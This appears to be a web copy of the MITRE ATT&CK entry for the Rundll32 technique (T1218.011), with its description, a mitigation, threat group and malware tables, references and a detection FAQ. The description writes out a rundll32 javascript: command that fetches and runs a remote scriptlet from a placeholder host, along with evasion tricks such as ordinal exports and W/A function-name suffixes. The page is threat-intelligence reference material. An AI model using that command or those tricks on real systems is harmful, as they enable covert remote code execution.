Description
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).
Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, ClickOnce can be proxied through Rundll32.exe.
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)
Threat actors may also abuse legitimate, signed system DLLs (e.g., zipfldr.dll, ieframe.dll) with rundll32.exe to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.(Citation: lolbas project Zipfldr.dll)(Citation: lolbas project Ieframe.dll)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).
Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
Platforms
Mitigations (1)
Exploit ProtectionM1050
Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.
Threat Groups (26)
| ID | Group | Context |
|---|---|---|
| G0047 | Gamaredon Group | [Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used rundll32 to launch additional malicious components.(Citation: ESET Gamaredon... |
| G0046 | FIN7 | [FIN7](https://attack.mitre.org/groups/G0046) has used `rundll32.exe` to execute malware on a compromised network.(Citation: Mandiant FIN7 Apr 2022) |
| G0073 | APT19 | [APT19](https://attack.mitre.org/groups/G0073) configured its payload to inject into the rundll32.exe.(Citation: FireEye APT19) |
| G0094 | Kimsuky | [Kimsuky](https://attack.mitre.org/groups/G0094) has used `rundll32.exe` to execute malicious scripts and malware on a victim's network.(Citation: Tal... |
| G1048 | UNC3886 | [UNC3886](https://attack.mitre.org/groups/G1048) has used rundll32.exe to execute MiniDump for dumping LSASS process memory.(Citation: Google Cloud T... |
| G0008 | Carbanak | [Carbanak](https://attack.mitre.org/groups/G0008) installs VNC server software that executes through rundll32.(Citation: Kaspersky Carbanak) |
| G0022 | APT3 | [APT3](https://attack.mitre.org/groups/G0022) has a tool that can run DLLs.(Citation: FireEye Clandestine Fox) |
| G0059 | Magic Hound | [Magic Hound](https://attack.mitre.org/groups/G0059) has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.(Citation: D... |
| G0127 | TA551 | [TA551](https://attack.mitre.org/groups/G0127) has used rundll32.exe to load malicious DLLs.(Citation: Unit 42 TA551 Jan 2021) |
| G0108 | Blue Mockingbird | [Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using rundll32.exe.(Citation: RedCanary Mockin... |
| G0102 | Wizard Spider | [Wizard Spider](https://attack.mitre.org/groups/G0102) has utilized `rundll32.exe` to deploy ransomware commands with the use of WebDAV.(Citation: Man... |
| G0050 | APT32 | [APT32](https://attack.mitre.org/groups/G0050) malware has used rundll32.exe to execute an initial infection process.(Citation: Cybereason Cobalt Kitt... |
| G0032 | Lazarus Group | [Lazarus Group](https://attack.mitre.org/groups/G0032) has used rundll32 to execute malicious payloads on a compromised host.(Citation: ESET Twitter I... |
| G0092 | TA505 | [TA505](https://attack.mitre.org/groups/G0092) has leveraged <code>rundll32.exe</code> to execute malicious DLLs.(Citation: Cybereason TA505 April 201... |
| G0052 | CopyKittens | [CopyKittens](https://attack.mitre.org/groups/G0052) uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, C... |
| G0096 | APT41 | [APT41](https://attack.mitre.org/groups/G0096) has used rundll32.exe to execute a loader.(Citation: Crowdstrike GTR2020 Mar 2020) |
| G0034 | Sandworm Team | [Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor which could execute a supplied DLL using rundll32.exe.(Citation: ESET Telebots ... |
| G0007 | APT28 | [APT28](https://attack.mitre.org/groups/G0007) executed [CHOPSTICK](https://attack.mitre.org/software/S0023) by using rundll32 commands such as <code>... |
| G0125 | HAFNIUM | [HAFNIUM](https://attack.mitre.org/groups/G0125) has used <code>rundll32</code> to load malicious DLLs.(Citation: Volexity Exchange Marauder March 202... |
| G0082 | APT38 | [APT38](https://attack.mitre.org/groups/G0082) has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code vi... |
Associated Software (69)
| ID | Name | Type | Context |
|---|---|---|---|
| S0260 | InvisiMole | Malware | [InvisiMole](https://attack.mitre.org/software/S0260) has used rundll32.exe for execution.(Citation: ESET InvisiMole June 2020) |
| S1160 | Latrodectus | Malware | [Latrodectus](https://attack.mitre.org/software/S1160) can use rundll32.exe to execute downloaded DLLs.(Citation: Elastic Latrodectus May 2024)(Citati... |
| S0196 | PUNCHBUGGY | Malware | [PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using Rundll32.(Citation: FireEye Know Your Enemy FIN8 Aug 2016) |
| S0635 | BoomBox | Malware | [BoomBox](https://attack.mitre.org/software/S0635) can use RunDLL32 for execution.(Citation: MSTIC Nobelium Toolset May 2021) |
| S0045 | ADVSTORESHELL | Malware | [ADVSTORESHELL](https://attack.mitre.org/software/S0045) has used rundll32.exe in a Registry value to establish persistence.(Citation: Bitdefender APT... |
| S0204 | Briba | Malware | [Briba](https://attack.mitre.org/software/S0204) uses rundll32 within [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/0... |
| S0576 | MegaCortex | Malware | [MegaCortex](https://attack.mitre.org/software/S0576) has used <code>rundll32.exe</code> to load a DLL for file encryption.(Citation: IBM MegaCortex) |
| S1064 | SVCReady | Malware | [SVCReady](https://attack.mitre.org/software/S1064) has used `rundll32.exe` for execution.(Citation: HP SVCReady Jun 2022) |
| S0342 | GreyEnergy | Malware | [GreyEnergy](https://attack.mitre.org/software/S0342) uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYST... |
| S0142 | StreamEx | Malware | [StreamEx](https://attack.mitre.org/software/S0142) uses rundll32 to call an exported function.(Citation: Cylance Shell Crew Feb 2017) |
| S0082 | Emissary | Malware | Variants of [Emissary](https://attack.mitre.org/software/S0082) have used rundll32.exe in Registry values added to establish persistence.(Citation: Em... |
| S0139 | PowerDuke | Malware | [PowerDuke](https://attack.mitre.org/software/S0139) uses rundll32.exe to load.(Citation: Volexity PowerDuke November 2016) |
| S1190 | Kapeka | Malware | [Kapeka](https://attack.mitre.org/software/S1190) is a Windows DLL file executed via ordinal by `rundll32.exe`.(Citation: Microsoft KnuckleTouch 2024)... |
| S0256 | Mosquito | Malware | [Mosquito](https://attack.mitre.org/software/S0256)'s launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.(Citati... |
| S0113 | Prikormka | Malware | [Prikormka](https://attack.mitre.org/software/S0113) uses rundll32.exe to load its DLL.(Citation: ESET Operation Groundbait) |
| S0554 | Egregor | Malware | [Egregor](https://attack.mitre.org/software/S0554) has used rundll32 during execution.(Citation: Cybereason Egregor Nov 2020) |
| S0518 | PolyglotDuke | Malware | [PolyglotDuke](https://attack.mitre.org/software/S0518) can be executed using rundll32.exe.(Citation: ESET Dukes October 2019) |
| S0081 | Elise | Malware | After copying itself to a DLL file, a variant of [Elise](https://attack.mitre.org/software/S0081) calls the DLL file using rundll32.exe.(Citation: Lot... |
| S0438 | Attor | Malware | [Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule rundll32.exe to load the dispatcher.(Citation: ESET Attor Oct 2019) |
| S1044 | FunnyDream | Malware | [FunnyDream](https://attack.mitre.org/software/S1044) can use `rundll32` for execution of its components.(Citation: Bitdefender FunnyDream Campaign No... |
References
- Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.
- Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.
- B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.
- gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.
- lolbas project. (n.d.). Ieframe.dll. Retrieved October 5, 2025.
- lolbas project. (n.d.). Zipfldr.dll. Retrieved October 5, 2025.
- Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.
Frequently Asked Questions
What is T1218.011 (Rundll32)?
T1218.011 is a MITRE ATT&CK technique named 'Rundll32'. It belongs to the Stealth tactic(s). Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid trigg...
How can T1218.011 be detected?
Detection of T1218.011 (Rundll32) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1218.011?
There are 1 documented mitigations for T1218.011. Key mitigations include: Exploit Protection.
Which threat groups use T1218.011?
Known threat groups using T1218.011 include: Gamaredon Group, FIN7, APT19, Kimsuky, UNC3886, Carbanak, APT3, Magic Hound.